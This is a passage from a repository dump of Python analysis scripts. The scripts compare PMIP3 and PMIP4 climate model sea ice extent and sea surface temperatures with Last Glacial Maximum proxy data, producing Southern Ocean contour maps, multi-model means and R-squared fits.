transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(MPI_winter.lon,MPI_winter.lat,MPI_winter.siconc,colors=['#bcbd22'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(MIROC_winter.lon,MIROC_winter.lat,MIROC_winter.siconc,colors=['#9467bd'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(IPSL_winter.lon,IPSL_winter.lat,IPSL_winter.fract_sic*100,colors=['#2ca02c'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\nax[3].contour(LOVEwinter.lon,LOVEwinter.lat,LOVEwinter,colors=['#F7DC6F'],levels=[15],linestyles=['solid'], transform=ccrs.PlateCarree(),linewidths=1.5)\n\nMMM_winter_mean = (CCSM4UoT_winter.siconc+CESM12_winter.IFRAC*100+LOVEwinter+AWI_winter.siconca+MPI_winter.siconc+MIROC_winter.siconc+IPSL_winter.fract_sic*100)/7\nvar1=(CCSM4UoT_winter.siconc-MMM_winter_mean)**2\nvar2=(CESM12_winter.IFRAC*100-MMM_winter_mean)**2\nvar3=(AWI_winter.siconca-MMM_winter_mean)**2\nvar4=(MPI_winter.siconc-MMM_winter_mean)**2\nvar5=(MIROC_winter.siconc-MMM_winter_mean)**2\nvar6=(IPSL_winter.fract_sic*100-MMM_winter_mean)**2\nvar7=(LOVEwinter-MMM_winter_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_winter_mean+STD)\nSTD3=(MMM_winter_mean-STD)\n\nax[7].contour(MMM_winter_mean.lon,MMM_winter_mean.lat,MMM_winter_mean,colors=['black'],levels=[15], transform=ccrs.PlateCarree(),linewidths=2.5)\nax[7].contour(STD2.lon,STD2.lat,STD2,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\nax[7].contour(STD3.lon,STD3.lat,STD3,levels=[15],colors=['black'], transform=ccrs.PlateCarree())\n\n\n\n# PMIP4 Proxy artist\nAWI = mlines.Line2D([], [], color='#B8255F', linestyle ='-',label = 'AWI-ESM-1')\nMIROC = mlines.Line2D([], [], color='#9467bd', linestyle ='-',label = 'MIROC-ES2L')\nMPI = mlines.Line2D([], [], color='#bcbd22', linestyle ='-', label = 'MPI-ESM1-2')\nIPSL = mlines.Line2D([], [], color='#2ca02c', linestyle ='-', label = 'IPSL-CM5A2')\nCCSM4UoT = mlines.Line2D([], [], color='#ff7f0e', linestyle ='-', label = 'UoT-CCSM4')\nCESM = mlines.Line2D([], [], color='#8c564b', linestyle ='-', label = 'CESM1.2')\niLOVECLIM = mlines.Line2D([], [], color='#F7DC6F', linestyle ='-', label = 'LOVECLIM')\nax[11].legend(handles=[MIROC,IPSL,MPI,AWI,iLOVECLIM,CESM,CCSM4UoT],frameon=False,title='PMIP4 models')\n\n#PMIP3 Proxy artist\nMIROC = mlines.Line2D([], [], color='#9467bd', linestyle ='-',label = 'MIROC-ESM-P')\nGISS = mlines.Line2D([], [], color='#17becf', linestyle ='-',label = 'GISS-E2-R')\nIPSL = mlines.Line2D([], [], color='#2ca02c', linestyle ='-', label = 'IPSL-CM5A-LR')\nCCSM4 = mlines.Line2D([], [], color='#ff7f0e', linestyle ='-', label = 'CCSM4')\nCNRM = mlines.Line2D([], [], color='black', linestyle ='-', label = 'CNRM')\nMPI = mlines.Line2D([], [], color='#bcbd22', linestyle ='-', label = 'MPI-ESM-P')\nFGOALS= mlines.Line2D([], [], color='#e377c2', linestyle ='-', label = 'FGOALS-G2')\nMRI = mlines.Line2D([], [], color='#1f77b4', linestyle ='-', label = 'MRI-CGCM3')\n#ax[11].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4],bbox_to_anchor=(1.04,1), loc=\"upper left\",frameon=False,title='PMIP3 models')\nax[10].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4],frameon=False,title='PMIP3 models')\n\n# LOVE proxy artists\nLOVE1 = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dotted',label = 'weakNA')\nLOVE2 = mlines.Line2D([], [], color='#F7DC6F', linestyle ='dashdot',label = 'weakNA_AB')\nax[14].legend(handles=[LOVE1,LOVE2],frameon=False,title='LOVECLIM sensitivity runs')\n\n# MMM proxy artists\nMMM = mlines.Line2D([], [], color='black', linewidth=2.5, linestyle ='-', label = 'Multi-model mean')\nSTD = mlines.Line2D([], [], color='black', linestyle ='-', label = 'Standard deviation')\nax[13].legend(handles=[MMM,STD],bbox_to_anchor=(1.5,0.5), loc=\"center left\",borderaxespad=1,frameon=False,title='Multi-model mean')\n\n# Observational data proxy artist\nred = mlines.Line2D([], [], color='red', marker='o', linestyle='None',markersize=4, label='Absence of sea ice')\nblue = mlines.Line2D([], [], color='blue', marker='o', linestyle='None',markersize=4, label='Presence of sea ice')\nblack = mlines.Line2D([], [], color='black', marker='o', linestyle='None',markersize=4, label='Possible presence of sea ice')\n#ax[15].legend(handles=[red,blue,black],bbox_to_anchor=(1.04,1), loc=\"upper left\",frameon=False,title='Proxy data')\nax[15].legend(handles=[red,blue,black],frameon=False,title='Proxy data')\nplt.subplots_adjust(hspace=0.09,wspace=0.07)\n\n# all in one legend\n#rcParams['font.family'] = 'arial'\nax[10].axis('off')\nax[11].axis('off')\nax[14].axis('off')\nax[15].axis('off')\n# ax[0].legend(handles=[CNRM,GISS,IPSL,MIROC,MPI,MRI,FGOALS,CCSM4UoT,AWI,CESM,iLOVECLIM,LOVE1,LOVE2],frameon=False,ncol=2)\n# ax[5].legend(handles=[red,blue,black],frameon=False)\n#plt.show()\nplt.savefig('Figures/Figure1.eps')\n"
},
{
"alpha_fraction": 0.7119901180267334,
"alphanum_fraction": 0.7255871295928955,
"avg_line_length": 26.89655113220215,
"blob_id": "0e28f2e2e745ddaa8dd182bab1780be89f88515e",
"content_id": "47eba8fcb02eee07c3da98ecf42afbbab1529ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 809,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 29,
"path": "/slopeSSTproxy.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\ncolumn = data['Latitude']\n\ndf = data[data.Latitude > -52]\nplt.scatter(data.Latitude,data.LGM,color='darkgray')\nave = data\nave.Latitude = ave.Latitude.round()\nave = ave.astype(float)\n\nave2 = df\nave2.Latitude = ave2.Latitude.round()\nave2 = ave2.astype(float)\ncolumn = ave['Latitude']\nproxyavg = ave2.groupby('Latitude').mean().reset_index()\n#plt.plot(proxyavg.Latitude,proxyavg.LGM,color='darkgray')\n#plt.show()\nslope = np.polyfit(proxyavg.Latitude,proxyavg.LGM,1)[0]\nprint(slope)\nprint(column.min())\n#print(proxyavg.LGM.mean())\n"
},
{
"alpha_fraction": 0.5631610155105591,
"alphanum_fraction": 0.6982961297035217,
"avg_line_length": 35.212764739990234,
"blob_id": "c6983410aa88321f9c6ddbdcbb4f9e2b506a5f45",
"content_id": "253ebb2208d64c9fd8c867eabb215e6217169c5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3404,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 94,
"path": "/Rsquared.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\nfrom scipy import stats\n\n# most area to least area finished with MMM\n\n# PMIP3\n# CCSM4, FGOALS, MRI, MPI, MIROC, IPSL, GISS, CNRM (MMM is commented after because removed later MMM)\n\nseaiceedge_PMIP3 = [-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5] #,-62.5]\nSSTtest_PMIP3 = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582] #,2.95]\nseaicearea_PMIP3 = [ 27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047] #,9.34]\ncolorsPMIP3 = ['#ff7f0e','#e377c2','#1f77b4','#bcbd22','#9467bd','#2ca02c','#17becf','black']\n\n# PMIP4\n#UoTCCSM4, CESM1.2, LOVECLIM, AWI, MPI, IPSL, MIROC (MMM is commented after because removed later MMM)\nseaiceedge_PMIP4 = [-53,-57.5,-59.5,-62,-65,-70,-75.5] #,-59]\nSSTtest_PMIP4 = [-1.017,0.161,2.218,0.957,2.451,3.404,5.583] #,1.774]\nseaicearea_PMIP4 = [ 33.15,23.75,17.55,14.73,5.18,2.46,0.36] #,19.08]\n# need to decide color for MMM\ncolorsPMIP4 = ['#ff7f0e','#8c564b','#F7DC6F','#B8255F','#bcbd22','#2ca02c','#9467bd']\n\n\n# LOVECLIM\n# weakNA_AB (LOVE2), weak_AB (LOVE1) (MMM is commented after because removed later MMM)\nseaiceedge_LOVE = [-58.5, -59.5] #,-59]\nSSTtest_LOVE = [1.61,2.15] #, 1.875]\nseaicearea_LOVE = [20.27, 15.73] #, 18.47]\ncolorsLOVE = ['#F7DC6F','#F7DC6F']\n\n\n# proxy\nproxyseaicearea = [15.35]\nproxyseaiceedge = [-61.5]\nproxySST = [1.52]\ncolorsproxy=['white']\nfacecolorsproxy=['black']\n\n# total (excluding MMM and proxy)\n# PMIP3, PMIP4, LOVECLIM PMIP3\n#seaiceedge_total = np.array([-55.5,-61.5,-62.5,-65,-66.5,-70,-65.5,-75.5,-53,-57.5,-59.5,-62,-65,-70,-75.5])\nseaiceedge_total = seaiceedge_PMIP3 + seaiceedge_PMIP4 + seaiceedge_LOVE\n#SSTtest_total = [-0.5208,1.998,2.885,2.692,2.911,2.884,3.708,5.582,-1.017,0.161,2.218,0.957,2.451,3.404,5.583]\nSSTtest_total = SSTtest_PMIP3 + SSTtest_PMIP4 + SSTtest_LOVE\n#seaicearea_total = [27.46,13.62,12.54,5.187,3.530,2.414,2.391,.06047,33.15,23.75,17.55,14.73,5.18,2.46,0.36]\nseaicearea_total = seaicearea_PMIP3 + seaicearea_PMIP4 + seaicearea_LOVE\n\n\ncorrelation_matrix_sie = np.corrcoef(SSTtest_total, seaiceedge_total)\ncorrelation_xy_sie = correlation_matrix_sie[0,1]\nr_squared_sie = correlation_xy_sie**2\nprint('Rsquared for sea ice edge vs SST is ',r_squared_sie)\n\ncorrelation_matrix_sia = np.corrcoef(SSTtest_total, seaicearea_total)\ncorrelation_xy_sia = correlation_matrix_sia[0,1]\nr_squared_sia = correlation_xy_sia**2\nprint('Rsquared for sea ice area vs SST is ',r_squared_sia)\n\n# checking answer\ndef polyfit(x, y, degree):\n results = {}\n\n coeffs = np.polyfit(x, y, degree)\n # Polynomial Coefficients\n results['polynomial'] = coeffs.tolist()\n\n correlation = np.corrcoef(x, y)[0,1]\n\n # r\n results['correlation'] = correlation\n # r-squared\n results['determination'] = correlation**2\n\n return results\nprint(polyfit(SSTtest_total,seaicearea_total,1))\n\n\nfrom sklearn.metrics import r2_score\n\nR_square = r2_score(SSTtest_total, seaicearea_total)\nprint('Coefficient of Determination', R_square)\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(SSTtest_total, seaicearea_total)\nprint(\"r-squared:\", r_value**2)\n\nslope, intercept, r_value, p_value, std_err = stats.linregress(SSTtest_total, seaiceedge_total)\nprint(\"r-squared:\", r_value**2)\n"
},
{
"alpha_fraction": 0.6356196999549866,
"alphanum_fraction": 0.6956601738929749,
"avg_line_length": 47.990989685058594,
"blob_id": "c4ed3fde7c03fc0c64a991d9d85fee4553e668ef",
"content_id": "0a2be6785db458276199d67cffb4339c82fe4d25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10878,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 222,
"path": "/Figure3.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# Trying to rewrite figure 3 in Python\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\nimport matplotlib.patches as mpatches\nimport xarray as xr\nimport matplotlib as mpl\nimport cartopy.crs as ccrs\nimport cmocean\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nSST = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/MIROC/SST/tos_Omon_MIROC-ES2L_lgm_r1i1p1f2_gn_320001-329912.nc',decode_times=False)\nSST = SST.mean(dim='time')\n\nproxy = pd.read_excel('~/Desktop/UNSW/Table_Recap_LGM_Final.xlsx',engine=\"openpyxl\",sheet_name='Data')\ndata = proxy[['Latitude','Longitude', 'LGM']]\ndata = data[3:]\ndata = data.dropna()\ndata = data.reset_index(drop=True)\n# lat is -90:90 and lon is -180:180\nlat = data['Latitude']\nlon = data['Longitude']\nsst = data['LGM']\ndata['LGM'] = data['LGM'].astype(float)\ndef LonTo360(dlon):\n # Convert longitudes to 0-360 deg\n dlon = ((360 + (dlon % 360)) % 360)\n return dlon\nlonconverted = LonTo360(lon)\n#Read the data and convert into numpy array\ny = np.array(data.Latitude)\nx = np.array(data.Longitude)\nz = np.array(data.LGM)\n\n# PMIP3 SST\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/tos_Oclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/MRISST_winter_PMIP3.nc',decode_times=False)\nCCSM4_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/CCSM4SST_winter_PMIP3.nc',decode_times=False)\nMPI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/MPISST_winter_PMIP3.nc',decode_times=False)\nGISS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP3SST/GISSSST_winter_PMIP3.nc',decode_times=False)\nCNRM_3 = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3 = CNRM_3.mean(dim='time')\nFGOALS_3= xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3 = FGOALS_3.mean(dim='time')\nIPSL_3 = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3 = IPSL_3.mean(dim='time')\nMIROC_3 = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3 = MIROC_3.mean(dim='time')\nMRI_3 = MRI_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"TIME8\": \"time\",\"TOSMRI\":\"tos\"})\nMRI_3 = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3 = MRI_3.mean(dim='time')\nCCSM4_3 = CCSM4_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"CCSM4\":\"tos\"})\nGISS_3 = GISS_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"GISS\":\"tos\"})\nMPI_3 = MPI_3.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"MPI\":\"tos\"})\nCNRM_3 -= 273.15\nGISS_3 -= 273.15\nIPSL_3 -= 273.15\nMIROC_3 -= 273.15\nMPI_3 -= 273.15\nMRI_3 -= 273.15\nFGOALS_3 -= 273.15\nCCSM4_3 -= 273.15\nPMIP3names = ['CNRM','GISS-E2-R','IPSL-CM5A-LR','MIROC-ESM-P','MPI-ESM-P','MRI-CGCM3','FGOALS-G2','CCSM4']\nPMIP3models = [CNRM_3,GISS_3,IPSL_3,MIROC_3,MPI_3,MRI_3,FGOALS_3,CCSM4_3]\n\n# PMIP4 SST\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/AWI_SST_lonconverted.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nMIROC_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/MIROC_PMIP4_tos_regrid.nc',decode_times=False)\nIPSL_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/IPSL_SSTfixed.nc',decode_times=False)\nIPSL_4 = IPSL_4.rename({\"LON\": \"lon\",\"LAT\": \"lat\",\"TIME_COUNTER\":\"time\",\"SA\":\"tos\"})\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/CCSM4-UoT_sst.nc',decode_times=False)\nMPI_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/MPI_PMIP4_tos_regrid.nc',decode_times=False)\n\n# getting summer months\nAWI = xr.concat([AWI.sel(time=(AWI.time[1::12])), AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI = AWI.mean(dim='time')\nAWI = AWI.tos\nMIROC_4 = xr.concat([MIROC_4.sel(time=(MIROC_4.time[1::12])), MIROC_4.sel(time=(MIROC_4.time[2::12]))], dim=\"time\") # Feb march\nMIROC_4 = MIROC_4.mean(dim='time')\nMIROC_4 = MIROC_4.tos\nCESM12 = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12 = CESM12.mean(dim='time')\nCESM12 = CESM12.TEMP\nCESM12 = CESM12[0,:,:]\nCCSM4UoT = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT = CCSM4UoT.mean(dim='time')\nCCSM4UoT = CCSM4UoT.tos\nIPSL_4 = xr.concat([IPSL_4.sel(time=(IPSL_4.time[1])), IPSL_4.sel(time=(IPSL_4.time[2]))], dim=\"time\") # Feb March\nIPSL_4 = IPSL_4.mean(dim='time')\nIPSL_4 = IPSL_4.tos-273.15\nMPI_4 = xr.concat([MPI_4.sel(time=(MPI_4.time[1::12])), MPI_4.sel(time=(MPI_4.time[2::12]))], dim=\"time\")\nMPI_4 = MPI_4.mean(dim='time')\nMPI_4 = MPI_4.tos\nLOVEsic = LOVECLIM.sst\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nLOVECLIM = (mar+feb)/2\nPMIP4models = [MIROC_4, IPSL_4, MPI_4,AWI,LOVECLIM,CESM12,CCSM4UoT]\nPMIP4names= ['MIROC-ES2L','IPSL-CM5A2','MPI-ESM1-2','AWI-ESM-1','LOVECLIM','CESM1.2','UoT-CCSM4']\n\n\n# LOVECLIM sensitivity models SST\nweakNA = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVESST/V3LNAw-SSTREGRID.nc')\nweakNA_AB = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVESST/weakNA_ABSST_sum.nc')\nweakNA = weakNA.rename({\"TIME\":\"time\",\"SST\":\"tos\"})\nweakNA_AB = weakNA_AB.rename({\"AX006\":\"time\",\"SSTNHWSOW\":\"tos\",\"LON\":\"lon\",\"LAT\":\"lat\"})\n\nweakNA = weakNA.tos\nfeb = weakNA[1::12,:,:]\nfeb = feb.mean(dim='time')\nmar = weakNA[2::12,:,:]\nmar = mar.mean(dim='time')\nweakNA_sum = (feb+mar)/2\nweakNA_AB = weakNA_AB.tos\nfeb1 = weakNA_AB[1::12,:,:]\nfeb1 = feb1.mean(dim='time')\nmar1 = weakNA_AB[2::12,:,:]\nmar1 = mar1.mean(dim='time')\nweakNA_AB_sum = (feb1+mar1)/2\nLOVEmodels = [weakNA_sum,weakNA_AB_sum]\nLOVEnames = ['weakNA','weakNA_AB']\n\n# legends\n\nproxy = mlines.Line2D([], [], color='black', linestyle ='solid',label = 'Proxy 1˚ isoline')\nmodel = mlines.Line2D([], [], color='black', linestyle ='dashed',label = 'Model 1˚ isoline')\n\n\nnrows=5\nncols=4\nextent = [-180, 180, -90, -35]\n\nfig, ax = plt.subplots(nrows=nrows,ncols=ncols,\n subplot_kw={'projection': ccrs.SouthPolarStereo()},\n figsize=(16,14))\nplt.rcParams['font.sans-serif'] = 'Arial'\nplt.rcParams[\"font.weight\"] = \"bold\"\nax=ax.flatten()\ntheta = np.linspace(0, 2*np.pi, 100)\ncenter, radius = [0.5, 0.5], 0.5\nverts = np.vstack([np.sin(theta), np.cos(theta)]).T\ncircle = mpath.Path(verts * radius + center)\n\ncm = plt.cm.get_cmap('RdYlBu_r')\ncmap = mpl.cm.RdYlBu_r\nbounds = [-2,0,0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,5.5,6,6.5,7,7.5,8,10,12]\n\nnorm = mpl.colors.BoundaryNorm(bounds, cmap.N, extend='both')\n\n\n# plt.\n# 60 has been good\n# 21 levels brought me down to 3.5 MB\nlevels= 21\n\nfor n in range(15):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n #gl = ax[n].gridlines(crs=ccrs.PlateCarree(),draw_labels=True, dms=True, x_inline=True, y_inline=True,linestyle='--')\n ax[n].coastlines(zorder=4)\n ax[n].add_feature(cfeature.LAND, facecolor='1', edgecolor='k',zorder=3)\n ax[n].set_aspect('equal')\nfor n in range(16,18):\n ax[n].set_boundary(circle, transform=ax[n].transAxes)\n ax[n].gridlines(linestyle='--',zorder=4)\n ax[n].set_extent(extent, crs=ccrs.PlateCarree())\n #gl = ax[n].gridlines(crs=ccrs.PlateCarree(),draw_labels=True, dms=True, x_inline=True, y_inline=True,linestyle='--')\n ax[n].coastlines(zorder=4)\n ax[n].add_feature(cfeature.LAND, facecolor='1', edgecolor='k',zorder=3)\n ax[n].set_aspect('equal')\n\nfor i in range(len(PMIP3models)):\n ax[i].contourf(PMIP3models[i].lon,PMIP3models[i].lat,PMIP3models[i].tos,norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[i].contour(PMIP3models[i].lon,PMIP3models[i].lat,PMIP3models[i].tos,colors='black',linestyles='dashed',levels = [1], transform=ccrs.PlateCarree())\n ax[i].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[i].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[i].text(160,-28,PMIP3names[i],transform=ccrs.PlateCarree())\n\nfor j in range(7):\n ax[j+8].contourf(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[j+8].contour(PMIP4models[j].lon,PMIP4models[j].lat,PMIP4models[j],colors='black',linestyles='dashed',levels = [1], transform=ccrs.PlateCarree())\n ax[j+8].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[j+8].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[j+8].text(160,-28,PMIP4names[j],transform=ccrs.PlateCarree())\n\nfor l in range(2):\n ax[l+16].contourf(LOVEmodels[l].lon,LOVEmodels[l].lat,LOVEmodels[l],norm=norm,cmap=cm,levels = levels, transform=ccrs.PlateCarree())\n ax[l+16].contour(LOVEmodels[l].lon,LOVEmodels[l].lat,LOVEmodels[l],colors='black',linestyles='dashed',levels = [1],transform=ccrs.PlateCarree())\n ax[l+16].scatter(data.Longitude,data.Latitude,c=data.LGM, norm=norm,s=27,cmap=cm,edgecolors='k', transform=ccrs.PlateCarree(),zorder=5)\n one = ax[l+16].tricontour(lonconverted,y,z,colors=['black'],levels=[1], transform=ccrs.PlateCarree(),zorder=4)\n ax[l+16].text(160,-28,LOVEnames[l],transform=ccrs.PlateCarree())\n\n# plt.subplots_adjust(hspace=0.07,wspace=0)\n\n# cb_ax =\n# cbar =\n# cb_ax = fig.add_axes([0.83, 0.1, 0.02, 0.8])\n# plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),cax=cb_ax)\nplt.tight_layout()\ncb = plt.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),ax=ax.ravel().tolist(), shrink=0.95)\ncb.set_label(label='Temperature ($^{\\circ}$C)', size='large', weight='bold')\ncb.ax.tick_params(labelsize='large')\nplt.legend(handles=[proxy,model],frameon=False,fontsize=15)\nax[15].axis('off')\nax[18].axis('off')\nax[19].axis('off')\nplt.show()\n#plt.savefig('Figures/Figure3_9.27.21.eps',dpi=200)\n"
},
{
"alpha_fraction": 0.6451761722564697,
"alphanum_fraction": 0.6996461153030396,
"avg_line_length": 37.45561981201172,
"blob_id": "edae4bd38cc5c5fcb90c151791128a679facfa9c",
"content_id": "864676ccc8cb02d5917eeffc79ec45a2ab5181ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6500,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 169,
"path": "/Figure4_SO.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "import xarray as xr\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\n\n# PMIP3\nCCSM4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/CCSM4ptemp_PMIP3.nc')\nCNRM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/CNRMptemp_PMIP3.nc')\nFGOALS = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/FGOALSptemp_PMIP3.nc')\nGISS = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/GISSptemp_PMIP3.nc')\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/IPSLptemp_PMIP3.nc')\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MIROCptemp_PMIP3.nc')\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MPIptemp_PMIP3.nc')\nMRI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MRIptemp_PMIP3.nc')\n\n# PMIP4\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4SST/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/AWIptemp_PMIP4.nc',decode_times=False)\nMPI4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MPIptemp_PMIP4.nc',decode_times=False)\nLOVE = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/LOVECLIM_ptemp_ATL.nc',decode_times=False) # annual mean instead of summer\nMIROC_4 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/MIROC_ptemp_PMIP4_atl.nc',decode_times=False)\n# UoTCCSM4 only sst data\n# IPSL only sst data\n\n\n# LOVECLIM sensitivies\nweakNA = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/weakNA_ABptemp_PMIP3.nc',decode_times=False)\nweakNA_AB = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/ptemp/weakNAptemp_PMIP3.nc',decode_times=False)\n\n# cleaning up PMIP3\nCCSM4 = CCSM4.PTEMP\nCNRM = CNRM.PTEMP\nFGOALS = FGOALS.PTEMP\nGISS = GISS.PTEMP\nIPSL = IPSL.PTEMP\nMIROC = MIROC.PTEMP\nMPI = MPI.PTEMP\nMRI = MRI.PTEMP\n\n# cleaning up PMIP4\nCESM12 = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12 = CESM12.mean(dim='time')\nCESM12 = CESM12.TEMP\nCESMatl = xr.concat([CESM12.sel(lon=(CESM12.lon[300:360])), CESM12.sel(lon=(CESM12.lon[0:20]))], 